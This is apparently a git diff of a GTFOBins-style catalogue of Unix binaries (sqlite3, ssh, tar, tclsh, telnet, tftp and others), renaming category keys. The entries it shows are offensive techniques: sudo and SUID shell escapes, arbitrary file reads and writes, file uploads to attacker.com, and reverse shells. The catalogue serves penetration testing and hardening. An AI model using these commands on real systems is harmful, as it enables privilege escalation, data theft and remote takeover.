- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||
file-write:
|
||||
- code: |
|
||||
@ -14,8 +14,8 @@ functions:
|
||||
.import $LFILE t
|
||||
SELECT * FROM t;
|
||||
EOF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
||||
---
|
||||
|
@ -1,18 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost $SHELL --noprofile --norc
|
||||
- description: Spawn interactive shell through ProxyCommand option.
|
||||
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
@ -24,7 +24,7 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
ssh -F $LFILE localhost
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Spawn interactive root shell through ProxyCommand option.
|
||||
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./stdbuf -i0 /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
tail -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./tail -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo tail -c1G "$LFILE"
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: This only works for GNU tar.
|
||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||
file-write:
|
||||
@ -17,8 +17,8 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
---
|
||||
|
@ -1,20 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | sudo tee -a "$LFILE"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -8,14 +8,14 @@ functions:
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
TF=$(mktemp -u)
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -23,7 +23,7 @@ functions:
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
./tftp $RHOST
|
||||
put file_to_send
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,10 +1,10 @@
|
||||
---
|
||||
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: /usr/bin/time /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./time /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo /usr/bin/time /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: timeout 7d /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./timeout 7d /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ul "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ul "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ul "$LFILE"
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
unexpand -t99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./unexpand -t99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo unexpand -t99999999 "$LFILE"
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
uniq "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./uniq "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo uniq "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: unshare /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./unshare -r /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo unshare /bin/sh
|
||||
---
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user